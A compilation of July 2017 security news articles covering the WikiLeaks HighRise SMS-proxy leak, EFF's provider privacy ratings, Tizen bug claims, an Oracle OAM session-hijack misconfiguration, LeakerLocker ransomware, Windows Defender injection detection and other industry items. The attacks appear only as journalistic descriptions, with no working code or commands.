14.7.2017 thehackernews BigBrothers

WikiLeaks has today published the 16th batch of its ongoing Vault 7 leak, this time instead of revealing new malware or hacking tool, the whistleblower organisation has unveiled how CIA operatives stealthy collect and forward stolen data from compromised smartphones.
Previously we have reported about several CIA hacking tools, malware and implants used by the agency to remotely infiltrate and steal data from the targeted systems or smartphones.
However, this time neither Wikileaks nor the leaked CIA manual clearly explains how the agency operatives were using this tool.
But, since we have been covering every CIA leak from the very first day, we have understood a possible scenario and have illustrated how this newly revealed tool was being used.
Explained: How CIA Highrise Project Works
In general, the malware uses the internet connection to send stolen data after compromising a machine to the attacker-controlled server (listening posts), but in the case of smartphones, malware has an alternative way to send stolen data to the attackers i.e. via SMS.
But for collecting stolen data via SMS, one has to deal with a major issue – to sort and analyse bulk messages received from multiple targeted devices.
To solve this issue, the CIA created a simple Android application, dubbed Highrise, which works as an SMS proxy between the compromised devices and the listening post server.
"There are a number of IOC tools that use SMS messages for communication and HighRise is a SMS proxy that provides greater separation between devices in the field ("targets") and the listening post" by proxying ""incoming" and "outgoing" SMS messages to an internet LP," the leaked CIA manual reads.
What I understood after reading the manual is that CIA operatives need to install an application called "TideCheck" on their Android devices, which are set to receive all the stolen data via SMS from the compromised devices.
The last known version of the TideCheck app, i.e. HighRise v2.0, was developed in 2013 and works on mobile devices running Android 4.0 to 4.3, though I believe, by now, they have already developed an updated versions that work for the latest Android OS.

Once installed, the app prompts for a password, which is "inshallah," and after login, it displays three options:
Initialize — to run the service.
Show/Edit configuration — to configure basic settings, including the listening post server URL, which must be using HTTPS.
Send Message — allows CIA operative to manually (optional) submit short messages (remarks) to the listening post server.
Once initialized and configured properly, the app continuously runs in the background to monitor incoming messages from compromised devices; and when received, forwards every single message to the CIA's listening post server over a TLS/SSL secured Internet communication channel.
Previous Vault 7 CIA Leaks
Last week, WikiLeaks dumped two alleged CIA implants that allowed the agency to intercept and exfiltrate SSH credentials from targeted Windows and Linux operating systems using different attack vectors.
Dubbed BothanSpy — implant for Microsoft Windows Xshell client, and Gyrfalcon — targets the OpenSSH client on various distributions of Linux OS, including CentOS, Debian, RHEL (Red Hat), openSUSE and Ubuntu.
Since March, the whistleblowing group has published 16 batches of "Vault 7" series, which includes the latest and last week leaks, along with the following batches:
OutlawCountry – An alleged CIA project that allowed it to hack and remotely spy on computers running the Linux operating systems.
ELSA – Alleged CIA malware that tracks geo-location of targeted computers and laptops running the Microsoft Windows operating system.
Brutal Kangaroo – A tool suite for Microsoft's Windows used by the spying agency to target closed networks or air-gapped computers within an organisation or enterprise without requiring any direct access.
Cherry Blossom – An agency's framework used for monitoring the Internet activity of the targeted systems by exploiting vulnerabilities in Wi-Fi devices.
Pandemic – A CIA's project that allowed the agency to turn Windows file servers into covert attack machines that can silently infect other computers of interest inside a targeted network.
Athena – An agency's spyware framework that has been developed to take full control of the infected Windows machines remotely, and works for every version of Microsoft's Windows operating systems, from XP to Windows 10.
AfterMidnight and Assassin – Two CIA malware frameworks for the Windows platform that has been designed to monitor activities on the infected remote host computer and execute malicious actions.
Archimedes – Man-in-the-middle attack tool allegedly developed by the CIA to target computers inside a Local Area Network (LAN).
Scribbles – Software reportedly designed to embed 'web beacons' into confidential documents, allowing the agency to track insiders and whistleblowers.
Grasshopper – Framework that allowed the CIA hackers to easily create their custom malware for breaking into Microsoft's Windows OS and bypassing antivirus protection.
Marble – Source code of a secret anti-forensic framework used by the agency to hide the actual source of its malware.
Dark Matter – Hacking exploits the spying agency designed to target iOS and Mac systems.
Weeping Angel – Spying tool used by the CIA hackers to infiltrate smart TVs, transforming them into covert microphones.
Year Zero – Alleged CIA hacking exploits for popular software and hardware.


EFF Reviews Privacy Practices of Online Service Providers

14.7.2017 securityweek BigBrothers

During 2016, the US government made 49,868 requests to Facebook for user data; 27,850 requests to Google; and 9,076 requests to Apple. Governments will not stop making these requests, since the internet has become a major avenue for mass surveillance. The real issue is to what extent internet companies will seek to protect their users' data from unwarranted government intrusions.

Each year, the Electronic Frontier Foundation (EFF) publishes an annual 'Who Has Your Back' analysis of the basic privacy policy of major online service providers. It looks at five primary characteristics:

• Best privacy practices (including a satisfactory public, published policy and a published transparency rep ort)

• Informs users about government data requests (in advance of actually handing over any data)

• Refusal to hand over data without legal requirement (including by leakage or sale to third parties)

• Stands up National Security Letter (NSL) gag orders (with a public pledge to invoke the right to seek judicial review of all indefinite gag orders)

• Has a pro-user public policy (including support for reform of Section 702 of the FISA Amendments Act that will reduce the collection of information on innocent people).

A star is awarded for each category satisfied by the provider. This year (PDF), nine out of 26 evaluated companies have been awarded five stars: Adobe, Credo, Dropbox, Lyft, Pinterest, Sonic, Uber, Wickr, and Wordpress.

Telecoms companies generally perform poorly. "When it comes to adopting policies that prioritize user privacy over facilitating government data demands," notes the report, "the telecom industry for the most part has erred on the side of prioritizing government requests." Particularly at fault here are AT&T, Comcast, T-Mobile, and Verizon -- all with a single star in the 'best practices' category.

This is not, however, universal in telecoms. "Credo Mobile [5 stars] has repeatedly proven that telecom companies can adopt policies that earn credit in every category year after year. Similarly, Sonic [5 stars], an ISP competitor to AT&T, Comcast, TMobile, and Verizon, has now earned credit in every category of EFF's annual report for five years."

Some technology companies that have been high performers in previous years have dropped from that position this year -- for example, Facebook, Google and Twitter. All three have so far failed to publicly commit to requesting judicial review of all NSLs. Fewer than half of the reviewed companies have actually made that commitment: Adobe, Airbnb, Apple, Credo, Dropbox, Lyft, Pinterest, Slack, Sonic, Uber, Wickr, and WordPress.

"We applaud these companies that have taken a public stand to ensure judicial oversight of gag orders and urge others within the technology space to do the same," says EFF.

Failure to be awarded all five stars should not in itself suggest a complete failure in user privacy concern -- only that the company could do even better. For example, of Google, EFF says, "This is Google's sixth year in Who Has Your Back, and it has adopted a number of industry best practices, including publishing a transparency report, requiring a warrant for content, and publishing its guidelines for law enforcement requests. Google promises to inform users before disclosing their data to the government and supports substantive reforms to rein in NSA surveillance. Google prohibits third parties from allowing Google user data to be used for surveillance purposes."

Its failure to win five stars this year is solely down to the lack of a public policy to demand a judicial review on NSL letters. "We urge Google to create a public policy of requesting judicial review of all National Security Letters," says EFF. On its own, this doesn't mean that Google does not have such a policy (it may or it may not), it simply has not publicly avowed the policy.

Apple is another tech giant that just falls short of five stars. Unlike Google, it does have a publicly stated policy of demanding a judicial review on all NSLs. Apple's published policy states, "If Apple receives a National Security Letter (NSL) from the U.S. government that contains an indefinite gag order, Apple will notify the government that it would like the court to review the nondisclosure provision of the NSL pursuant to USA FREEDOM ."

Apple is not, however, specifically campaigning for the reform of Section 702.

Two companies criticized by EFF are Amazon and WhatsApp, both receiving just 2 stars. While EFF praises WhatsApp's move to adopt end-to-end encryption by default for its billion users, its policies still lag behind. Amazon has been rated number one in customer service, yet it hasn't made the public commitments to stand behind its users' digital privacy that the rest of the industry has.

"The tech industry as a whole has moved toward providing its users with more transparency," comments EFF senior staff attorney Nate Cardozo; but telecommunications companies -- which serve as the pipeline for communications and Internet service for millions of Americans -- are failing to publicly push back against government overreach. Both legacy telcos and the giants of Silicon Valley can and must do better. We expect companies to protect, not exploit, the data we have entrusted them with."


Samsung Tizen Accused of Being Home to at Least 27,000 Findable Bugs

14.7.2017 securityweek Vulnerebility

A purveyor of static code analysis wished to pitch his product to Samsung. What better way, he thought, than to run his product against the Samsung Tizen operating system, and demonstrate the results. The demonstration fell through, and the purveyor decided instead to publish his findings.

The purveyor is Andrey Karpov, CTO at "Program Verification Systems" Co Ltd and one of the developers of PVS-Studio. In a report published Wednesday, he claims that PVS-Studio would find 27,000 coding errors in Tizen. He actually checked only 3.3% of the code; but finding about 900 errors, he believes that would extrapolate to 27,000.

If his figures are correct, it could be a lot worse. He suggests that one use of PVS-Studio will detect "more than 10% of errors that are present in the code." Regular use would push that up to about 20% of the errors -- but either way, if his figures are correct, the implication is that Tizen potentially houses more than 250,000 bugs.

Tizen is a Linux-based open-source operating system designed for wide use in Samsung products: smartphones, tablets, smart TVs, smart watches, cameras and PCs. The project started in 2013, and by 2015 it had reached smartphones. Today it can be found on millions of devices and especially smart TVs.

Tizen is not new to controversy. Earlier this year security researcher Amihai Neiderman, then at Israeli firm Equus Technologies, reported the presence of 40 zero-day vulnerabilities in Tizen. "Right now, Tizen isn't mature enough, isn't ready enough to be sent to the public like this," he commented. "If those vulnerabilities I found in a few hours of research, then somebody who's really going to dedicate himself to be a Tizen researcher will find way more vulnerabilities."

27,000 bugs do not translate to 27,000 vulnerabilities -- but some of them could. For example, Karpov claims to have found 52 errors in which private data is not cleared. Only one is in the direct Samsung code -- the rest are in third-party libraries used in Tizen. "I think this is a serious omission," he writes, "since is does not matter which part of the program will be erroneous, when private data will remain somewhere in memory and then someone will use it."

Karpov wrote an open letter to Samsung in May 2017. He described a number of the errors he had found, and said "Our team is willing to work on improving the quality of Tizen project. The text contains remarks to the code fragments, but this is not criticism. All projects have bugs. The aim was to show by real examples that we aren't talking about abstract recommendations concerning the code improvement, but about real defects that we can find and fix."

Samsung's Youil Kim rejected the approach. Stating that "We currently have our own static analysis tool and run it regularly for Tizen," Kim added, "However, we don't agree with that Tizen has 27,000 defects that should be fixed."

Karpov begs to differ.

SecurityWeek has reached out to Samsung for a statement on this issue, but has had no response at the time of writing. If one is received, it will be appended to the post.


Dell Launches Endpoint Security Product for Air-Gapped Systems

13.7.2017 securityweek Safety

Dell announced on Thursday the availability of a new version of its Endpoint Security Suite Enterprise product designed specifically for air-gapped systems.

The solution is designed to protect isolated computers from malware, insiders and other threats using artificial intelligence and predictive mathematical models provided by endpoint security firm Cylance.

Researchers demonstrated in the past years that malware can leverage several methods to exfiltrate sensitive data from air-gapped systems, including through noise, LEDs, heat and radio frequencies.Dell Launches Endpoint Security Product for Air-Gapped Systems

Since isolated systems are not connected to the Internet, the security products installed on them cannot automatically receive regular malware definitions and other updates. By teaming up with Cylance, whose mathematical models only require a few updates per year, Dell has developed a solution that can protect a device without requiring an Internet connection.

In addition to threat protection features, Endpoint Security Suite Enterprise provides data encryption capabilities designed for securing files on any device against both external attacks and insiders (e.g. malicious USB drives). IT teams can enforce encryption policies on multiple endpoints and operating systems without disrupting productivity, Dell said. The product also includes web protection filtering capabilities.

Three versions of Dell Endpoint Security Suite Enterprise are currently available: one for systems with an Internet connection, one for devices that connect to an on-premises server for updates, and one for systems that are completely isolated.

"Highly-regulated organizations and government agencies need to deploy air gap solutions to protect their highly sensitive data, but have been unable to take advantage of the latest security technology that requires cloud connections," said Brett Hansen, vice president of Endpoint Data Security and Management at Dell.

"Dell is responding to their heightened needs by adapting our flagship Endpoint Security Suite Enterprise solution for on-premises, air gap environments – giving these organizations an advanced threat protection solution that has been inaccessible to them before now," Hansen added.

The air gap version of Dell Endpoint Security Suite Enterprise is available now in the United States and other select countries around the world.


'HighRise' Android Malware Used by CIA to Intercept SMS Messages

13.7.2017 securityweek BigBrothers

WikiLeaks on Thursday published a user guide describing what appears to be a tool used by the U.S. Central Intelligence Agency (CIA) to intercept SMS messages on Android mobile devices.

Named HighRise, the version of the malware described in the WikiLeaks document is disguised as an app called TideCheck, and it only works on Android versions between 4.0 and 4.3.

According to its developers, the tool must be manually downloaded, installed and activated on the targeted device – this means that the attacker needs to have physical access to the smartphone or trick victims into installing it themselves.

The second scenario is less likely as activating the app requires the user to open the TideCheck app, enter the “inshallah” password (the Arabic expression for “God willing”), and select the “Initialize” option from the menu. The document shows that the app will automatically run in the background after a reboot once it has been manually activated.

HighRise can be used to proxy incoming SMS messages received by the compromised device to a remote server. The tool also includes functionality for sending messages to the server via a secure communications channel.

The user guide leaked by WikiLeaks is for version 2.0 of HighRise and it’s dated December 2013. Google has made numerous security improvements to the Android operating system since version 4 – the latest version is Android 7 Nougat – and malware such as HighRise may no longer work without significant updates.

On the other hand, cybercriminals have been keeping up with the improvements and they still manage to create profitable Android malware. Furthermore, given that HighRise requires a significant amount of user interaction, it’s possible that this or other similar projects are still successfully utilized by the CIA.

Over the past months, WikiLeaks has described several “Vault 7” tools allegedly used by the agency. The most recent leaks detail malware designed for redirecting traffic on Linux systems (OutlawCountry), stealing SSH credentials (BothanSpy), spreading malware on an organization’s network (Pandemic), locating people via their device’s Wi-Fi (Elsa), hacking routers and access points (Cherry Blossom), and accessing air-gapped networks (Brutal Kangaroo).


Researchers Remotely Hijack Oracle OAM 10g Sessions

13.7.2017 securityweek Hacking

Two security researchers recently discovered an issue with improperly configured Oracle Access Manager (OAM) 10g that can be exploited by remote attackers to hijack sessions from unsuspecting users.

The issue, security researchers Nabeel Ahmed and Tom Gilis discovered, is related to the OAM authentication flow. In this Oracle Single Sign-On (SSO) implementation, the OAM server only validates whether the requested resource is indeed protected or not, and then redirects the user to a login page.

The OAM Server, the researchers note, sets the OAMREQ cookie (which contains information regarding the location of the requested resource) in the user's browser, so it would know on the next request for which resource the user is authenticating.

Next, the user submits credentials on the provided login screen, and the OAM server verifies them and, if the logon is successful, serves a cookie and a valid session, while also redirecting the user to the protected resource.

While analyzing the cookies the server delivers to the user, the security researchers noticed that the request/response flow contains some red flags. One of them is a parameter called rh=, which is the domain of the protected resource, while the other is the fact that the cookie is sent via a GET request.

The security researchers also noticed that, while the OAM server validates whether the resource is protected or not, it doesn’t serve an error if the resource doesn’t exist. Even in such cases, the OAM server redirects the user to the login page and serves an OAMREQ cookie.

After receiving a cookie for a non-existing resource, the researchers tested their findings against real resources and discovered two issues: the user is redirected after submitting credentials (Open Redirect), and the cookie value is transmitted in the GET request

“Since we can control where the user has to go and since we also can read the cookie value that is coming from the user we can hijack his session,” Ahmed notes.

For that, the user would need to be tricked into clicking a link and logging in. However, since the user is required to log in on the real portal, that shouldn’t raise suspicion. If the user is logged in, the cookie would be retrieved without issues and without the victim noticing it.

“We found hundreds of hundreds of high profile organization with the same misconfiguration, all of them exposed against session hijacking. We analyzed 100 high profile domains and only 1 was properly secured against this attack,” Ahmed said.

An attacker knowing such domains could send phishing emails and lure victims into clicking the link. The attacker doesn’t have to set up another website to capture credentials, but the victim is redirected to the login page, where they are asked to submit their credentials.

The server responds with a HTTP 302 redirect pointing to a malicious domain that steals users’ cookie and uses it to log in to their account. The webserver sends a redirect to the victim with the same cookie information to the appropriate domain, meaning that both the victim and the attacker are logged in, each on their independent session.

According to the researcher, when they contacted Oracle to point out the configuration issue, the company informed them that the problem had been already addressed through a feature called SSODomains. However, if SSODomains isn’t defined, it “effectively means you'll be able to get valid session for any domain,” the security researcher said.

According to Ahmed, the NIST CVSSv3 calculator would give the vulnerability an overall score of 9.3, meaning that it is a Critical issue.


Free Scanner Finds 50,000 EternalBlue-Vulnerable Systems

13.7.2017 securityweek Safety

More than 50,000 computers vulnerable to the NSA-linked EternalBlue exploit were found by a free vulnerability scanner in recent weeks.

Dubbed Eternal Blues, the tool was designed to provide network administrators with visibility into the EternalBlue-vulnerable machines in their networks, but without actually exploiting the flaw. In the wake of WannaCry, NotPetya, and other global infections leveraging the NSA-linked exploit, knowing whether a network is vulnerable or not is certainly a good idea.

According to Elad Erez, the security researcher who built the scanner, data collected through Eternal Blues over the past couple of weeks reveals that more than 50,000 scanned hosts are vulnerable to the exploit.

Erez also warns that sometimes all it takes is a single vulnerable machine to compromise an entire network. Using Eternal Blues, the administrator(s) of a network with around 10,000 hosts found the only two machines that were still vulnerable, thus securing the entire environment.

As of July 12, over 8 million IPs were scanned using Eternal Blues, most of which (1.5 million) are located in France. Vulnerable machines were found in around 130 countries and the top 3 countries “had more than 30,000 vulnerable hosts altogether,” the security researcher says.

Over half (53.82%) of the vulnerable hosts still have SMBv1 enabled, the researcher also discovered. Moreover, he notes that 1 out of 9 hosts in a network is vulnerable to EternalBlue.

Although Eternal Blues found only around 50,000 vulnerable systems, Erez warns that the number is much higher. Issues with the scanner prevented it from correctly reporting the number of vulnerable host. The researcher addressed those in a version released on July 2, but didn’t take previous findings into account when presenting the above numbers.

According to Erez, however, awareness on EternalBlue appears to have increased. The mere fact that admins are using the scanner is proof of that, he says.

To keep systems and networks secure, admins should apply the latest patches, perform periodic assessments of risks in their networks, and disable SMBv1, the researcher says. He also advises enabling automatic updates on Windows systems.

“Please, don’t be mistaken – recent ransomware attacks are the ones that made all the buzz, since they actually tell you when they hit you. I believe there are many more EternalBlue-based attacks which remain off the radar and are still unknown to,” the researcher points out.


New Ransomware Threatens to Send Your Internet History & Private Pics to All Your Friends
13.7.2017 thehackernews
Ransomware

After WannaCry and Petya ransomware outbreaks, a scary (but rather creative) new strain of ransomware is spreading via bogus apps on the Google Play Store, this time targeting Android mobile users.
Dubbed LeakerLocker, the Android ransomware does not encrypt files on victim's device, unlike traditional ransomware, rather it secretly collects personal images, messages and browsing history and threatens to share it to their contacts if they don't pay $50 (£38).
Researchers at security firm McAfee spotted the LeakerLocker ransomware in at least two apps — Booster & Cleaner Pro and Wallpapers Blur HD — in the Google Play Store, both of which have thousands of downloads.
To evade detection of malicious functionality, the apps initially don’t contain any malicious payload and typical function like legitimate apps.
But once installed by users, the apps load malicious code from its command-and-control server, which instructs them to collect a vast number of sensitive data from the victim's phone — thanks to its victims granting unnecessary permissions blindly during installation.
The LeakerLocker ransomware then locks the home screen and displays a message that contains details of the data it claims to have stolen and holds instructions on how to pay the ransom to ensure the information is deleted.
The ransom message reads:
All personal data from your smartphone has been transferred to our secure cloud.
In less than 72 hours this data will be sent to every person on your telephone and email contacts list. To abort this action you have to pay a modest ransom of $50 (£38).
Please note that there is no way to delete your data from our secure but paying for them. Powering off or even damaging your smartphone won't affect your data in the cloud.
Although the ransomware claims that it has taken a backup of all of your sensitive information, including personal photos, contact numbers, SMS', calls and GPS locations and browsing and correspondence history, researchers believe only a limited amount of data on victims is collected.
According to researchers, LeakerLocker can read a victim's email address, random contacts, Chrome history, some text messages and calls, take a picture from the camera, and read some device information.

All the above information is randomly chosen to display on the device screen, which is enough to convince the victims that lots of data have been copied.
Both malicious apps have since been removed by Google from the Play Store, but it is likely that hackers will try to smuggle their software into other apps.
If you have installed any of the two apps, uninstall it right now.
But if you are hit by the ransomware and are worried about your sexy selfies and photographs being leaked to your friends and relatives, you might be thinking of paying a ransom.
Do not pay the Ransom! Doing so motivates cyber criminals to carry out similar attacks, and there is also no guarantee that the stolen information will be deleted by the hackers from their server and will not be used to blackmail victims again.


Researcher Claims Samsung's Tizen OS is Poorly Programmed; Contains 27,000 Bugs!
13.7.2017 thehackernews
Vulnerebility

A researcher has claimed that Samsung's Tizen operating system that runs on millions of Samsung products is so poorly programmed that it could contain nearly 27,000 programming errors, which could also lead to thousands of vulnerabilities.
Tizen is a Linux-based open-source operating system backed by Intel and Samsung Electronics, which has been in development since early 2012 and designed for smartphones, tablets, smart TVs, smart watches, cameras and PCs.
According to Andrey Karpov — founder of Russia-based company Program Verification Systems that made PVS-Studio, a static code analyzer tool that helps programmers to find and fix bugs in their source codes — his team has discovered hundreds of errors in Tizen project using PVS-Studio.
Samsung's Tizen operating system, written in C/C++ programming language, currently has 72.5 million lines of source code, out of which Karpov's team has analysed some randomly chosen modules i.e. 3.3% of the entire Project and found nearly 900 errors.
"If we extrapolate the results, we will see that our team is able to detect and fix about 27000 errors in Tizen," Karpov says.
In April this year, Israeli researcher Amihai Neiderman called Tizen "the worst code I've ever seen" after he examined the operating system and discovered as many as 40 zero-day vulnerabilities in Tizen code.
After finding almost a thousand bugs in Tizen code, Karpov contacted Samsung to pitch for the sale of static analyser PVS-Studio software, but Youil Kim from Samsung declined the offer.
According to a mail exchanged between Karpov and Kim, Samsung is already using the SVACE technology (Security Vulnerabilities and Critical Errors Detector) to detect potential vulnerabilities and errors in source code of applications created for Tizen.
"We are already aware that another tool can find additional defects. However, we don't agree with that Tizen has 27,000 defects that should be fixed. As you know, many of static analysis warnings are often considered as insignificant issues," Kim added.
Tizen operating system already runs on nearly 30 million Smart TVs, Galaxy Gear-branded watches Smart TVs, cameras, home appliances and some of its smartphones sold in countries like Russia, India and Bangladesh.
Samsung has even plans to have some 10 Million Tizen smartphones in the market at the end of this year.
So, if claims made by the researcher are true — which was also acknowledged by a Samsung representative to some extent — the company should shift their focus mainly towards the security of the operating system in Tizen 4.0, which is due for release in September.


Windows 10 Boosts Protections Against Code Injection Attacks

13.7.2017 securityweek Attack

Enhancements in Windows 10 Creators Update include improvements in Windows Defender Advanced Threat Protection (Windows Defender ATP) to keep users protected from threats such as Kovter and Dridex Trojans, Microsoft says.

Specifically, Windows Defender ATP in Creators Update can detect code injection techniques associated with these threats, such as process hollowing and atom bombing. Already used by various other threats, these methods enable malware to infect computers and engage into various nefarious activities while remaining stealthly.

Process hollowing is a technique where a threat spawns a new instance of a legitimate process, after which it replaces the legitimate code with that of the malware. While other injection techniques add a malicious feature to a legitimate process, hollowing results in a process that looks legitimate but is primarily malicious.

There are various threats using process hollowing, with Kovter, a four-year old click-fraud Trojan that adopted a fileless infection model last year and which was recently associated with ransomware such as Locky, being the most popular. In November last year, Kovter was found responsible for a massive spike in new malware variants.

Delivered mainly through phishing emails, Kovter hides most of its malicious components via registry keys, then uses native applications to execute the code and perform injection. For persistence, it adds shortcuts (.lnk files) to the startup folder or new keys to the registry.

The malware adds two registry entries to have its component file opened by the legitimate program mshta.exe. The component extracts an obfuscated payload from a third registry key and a PowerShell script is used to execute another script that injects shellcode into a target process. Through this shellcode, Kovter uses process hollowing to inject malicious code into legitimate processes.

Atom bombing is a rather new code injection method, based on a Windows vulnerability that can’t be patched, and which can be used by an attacker who has already compromised the targeted machine. The technique relies on malware writing malicious code to the global atom table and using asynchronous procedure calls (APC) to retrieve the code and insert it into the memory of the target process.

Dridex, a threat first spotted in 2014, was anearly adopter of atom bombing. Mainly distributed via spam emails, Dridex was designed to steal banking credentials and sensitive information, as well as to disable security products and provide attackers with remote access to victim computers. The threat remains stealthy and persistent through avoiding common API calls associated with code injection techniques.

When executed on the victim’s system, the malware looks for a target process and ensures user32.dll is loaded by this process, as it needs the DLL to access the required atom table functions. Next, the malware writes its shellcode to the global atom table, then adds NtQueueApcThread calls for GlobalGetAtomNameW to the APC queue of the target process thread to force it to copy the malicious code into memory.

“Kovter and Dridex are examples of prominent malware families that evolved to evade detection using code injection techniques. Inevitably, process hollowing, atom bombing, and other advanced techniques will be used by existing and new malware families,” John Lundgren, Windows Defender ATP Research Team, explains.

Windows Defender ATP Creators Update, he adds, includes function calls and statistical models that can detect various malicious injection techniques and better expose covert attacks. According to Lundgren, Microsoft has already tested these capabilities against real-world examples of malware families employing process hollowing and atom bombing, among other methods.


Democracy at Risk from Poor Cybersecurity, Foreign Interference: Survey

13.7.2017 securityweek BigBrothers

Survey Shows Distinct Voter Concern for Elections and Cybersecurity

For more than a year, a single thread has dominated American news: foreign interference in US elections. It started in June 2016 in the run-up to the 2016 presidential election, when the Democratic National Committee (DNC) announced it had been hacked, and CrowdStrike accused Russia-based Cozy Bear (APT 29).

Since then, the ramifications have rarely been out of the news. In October 2016 the U.S. government formally accused Russia of being behind the cyberattacks, and by December it became known that the CIA believed that "Russia intervened in the 2016 election to help Donald Trump win the presidency, rather than just to undermine confidence in the U.S. electoral system," The Washington Post reported.

Since then, emphasis has switched to questioning the extent to which the Trump electoral team may or may not have known about or colluded with Russia in order to win the election; and whether it has or has not attempted to hinder or subvert subsequent law enforcement investigations. This has continued throughout 2017 until Wednesday this week when Rep. Brad Sherman (D-Calif.) formally introduced an article of impeachment against President Trump.

The article of impeachment revolves around Trump's dismissal of FBI director James Comey allegedly to hinder the FBI's investigation into former National Security Advisor, General Michael Flynn. "In all of this, Donald John Trump has acted in a manner contrary to his trust as President and subversive of constitutional government, to the great prejudice of the cause of law and justice and to the manifest injury of the people of the United States."

The huge and apparently unending ramifications of what started as just another cyber hack has caused cybersecurity firm Carbon Black to wonder what effect the cyber element has had on the American electorate. In June 2017, it conducted a nationwide survey (PDF) of 5,000 eligible U.S. voters, with particular reference to the upcoming midterm 2018 elections.

In an associated blog post Carbon Black CEO Patrick Morley commented, "In perhaps the most startling revelation from the survey, 1 in 4 voters said they will consider not voting in upcoming elections over cybersecurity fears."

In reality, this figure is easily covered by existing non-voters. Approximately only 57.9% of voters voted in the 2016 election, down less than 1% from the 58.6% that voted in 2012. So, while 25% of voters now say they may not vote in the midterms, this may have no effect on the actual voter turnout.

A second area where the obvious conclusion may not be the accurate conclusion can be seen in 'voter perception on election influence'. According to the survey, "47% of voters said they believe the 2016 U.S. election was influenced by foreign entities." However, there could be a strong element of 'sore loser' in these figures. There is an aspect of tribalism in political affiliation -- some people will always vote for one particular party simply because of tribal affiliations.

It is estimated that 48% of the electorate voted for Clinton (slightly more than the estimated 46% who voted Trump). There will be a strong incentive for the losing 48% to blame external causes on their loss -- and that could account for a large proportion of the 47% of responding voters who told Carbon Black that the result was influenced by foreign entities.

Despite not being able to definitively relate current sentiment to a past or future threat against electoral democracy, the Carbon Black survey nevertheless shows distinct voter concern for elections and cybersecurity. Several of the survey queries are unambiguous, and the results can be taken at face value. Forty-five percent of voters believe that Russia poses the biggest cybersecurity risk to U.S. elections. Of the remaining 55%, "20% said the United States itself; 17% said North Korea; 11% said China; and 4% said Iran. (3% answered 'other.')" notes the report.

Fifty-four percent of respondents "said the NSA leaks negatively impacted their trust in the U.S. election system to keep data safe;" and 44% "said they believe Russia will 'Be back' to influence future elections."

Carbon Black concludes, "Cyberattacks against our elections seed doubt in democracy. The idea that even a single voter is willing to forfeit their vote in fear of a cyberattack is startling. The fact that 1 in 4 voters said they would be willing to do so speaks volumes about how deeply this doubt has penetrated. The alleged cyberattacks surrounding the 2016 elections were a clarion call that foreign entities are motivated to disrupt U.S. elections." More starkly, it adds, "Our democracy is at risk."

Reality is probably not as extreme as this suggests. Political sentiment polling is very difficult, and Carbon Black has failed to eliminate 'other causes' in some of its questions. It might, for example, have been better to question 5,000 eligible voters that had actually voted in 2016 to get a more accurate picture of future voting intentions.

Nevertheless, it is clear that there is strong voter concern over the future of elections and cybersecurity. The report makes five proposals designed "to help restore voter confidence." The first is to implement stronger cybersecurity protection for online registration systems and voter databases. The second is to limit (or discontinue) the use of electronic voting machines. The third is to create an auditable paper trail of votes in every state and precinct. The fourth is to prohibit online voting.

The fifth is arguably the most important. In January 2017, then U.S. Homeland Security Secretary Jeh Johnson said, "I have determined that election infrastructure in this country should be designated as a subsector of the existing Government Facilities critical infrastructure sector. Given the vital role elections play in this country, it is clear that certain systems and assets of election infrastructure meet the definition of critical infrastructure, in fact and in law."

In its fifth recommendation, Carbon Black now calls for the government to "commit the same urgency and resources to protecting its elections as it does for 'traditional' critical infrastructure."


Trend Micro Patches Flaws in Deep Discovery Product

13.7.2017 securityweek  Vulnerebility

Trend Micro has released a critical patch for its Deep Discovery Director product to address several vulnerabilities that can be combined to achieve arbitrary command execution.

Deep Discovery Director is a Linux-based on-premises management platform that allows organizations to centralize the deployment of product updates and upgrades, Virtual Analyzer images, and configurations to Deep Discovery products.

Researchers at Core Security discovered in late May that version 1.1 of the product is affected by three potentially serious vulnerabilities, including command injection, hardcoded password and improper backup validation issues. Trend Micro addressed the bugs this week and published a security bulletin to notify customers.

According to Core Security, configuration and database backup archives are not signed or validated. They are encrypted, but the same cryptographic key is used across all virtual appliances.

An attacker with access to the Deep Discovery Director web console can exploit these weaknesses to create specially crafted backup archives that will be loaded by the application. The backup restoration process for accounts used to access the pre-configuration console is affected by a command injection vulnerability, allowing the attacker to leverage the malicious backup archive to execute arbitrary commands and spawn a root shell.

Core Security has published an advisory that contains technical details for each of the vulnerabilities and how they can be combined to achieve arbitrary command execution.

Trend Micro has classified the vulnerabilities as medium severity and pointed out that an attacker requires physical or remote access to the affected machine in order to exploit the flaws.

This is not the only critical patch released in recent months by Trend Micro for a Deep Discovery product. In March, the company informed customers of Deep Discovery Email Inspector (DDEI) 2.5.1 of critical vulnerabilities that can be exploited for remote code execution.

The security holes were reported to Trend Micro via the Zero Day Initiative (ZDI), which published separate advisories for each of the issues.


Wikileaks: CIA HighRise Android malware used to intercept and redirect SMSs
13.7.2017 securityaffairs BigBrothers

Wikileaks released the documentation for HighRise, an Android app used by the CIA to intercept and redirecting SMS messages to a CIA-controlled server.
WikiLeaks just published a new batch of documents related to another CIA hacking tool dubbed HighRise included in the Vault 7 released in partnership with media partners.

The tool is an Android application used by the US intelligence agents to intercept and redirecting SMS messages to a CIA-controlled server.

Below the list of features implemented by the Android malware:

Proxy “incoming” SMS messages received by HighRise host to an internet LP
Send “outgoing” SMS messages via the HighRise host
Provide a communications channel between the HighRise field operator & the LP
TLS/SSL secured internet communications
“HighRise is an Android application designed for mobile devices running Android 4.0 to 4.3. HighRise provides a redirector function for SMS messaging. There are a number of IOC tools that use SMS messages for communication and HighRise is a SMS proxy that provides greater separation between devices in the field (“targets”) and the listening post.” reads the manual.

According to a user manual leaked by Wikileaks, the malicious code only works on Android versions from 4.0 through 4.3 (Android Ice Cream Sandwich and Jelly Bean) that currently account for 8,8 percent of overall Android devices on the market.

Anyway, the document is dated back to December 2013, it is likely that the CIA has updated the tool in the meantime to target newer versions of the Android OS.

The HighRise tool is packaged inside an app named TideCheck (tidecheck-2.0.apk, MD5: 05ed39b0f1e578986b1169537f0a66fe).

HighRise Android hacking tool

The tool must be installed by CIA agents manually on the target system and need to be manually executed at least one time.

“Therefore, the HighRise application first must be manually run once before it will automatically run in the background or after a reboot. As a consequence, the HighRise application now shows up in the list of installed apps so it can be started by the HighRise operator. ” continues the manual.

When running the tool for the first time, CIA cyber spies must enter the special code “inshallah” (“God willing” in Arabic) to access its settings.

Once the code has been entered and the software is successfully activated, HighRise will run in the background listening for events. The hacking tool will automatically start every time the phone is powered on.

“Once activated, HighRise will run in the background listening for events. It will also automatically start when the phone is powered on. Activating HighRise multiple times will have no adverse affects.” continues the manual.

Below the list of release published by Wikileaks since March:

HighRise – 13 July, 2017
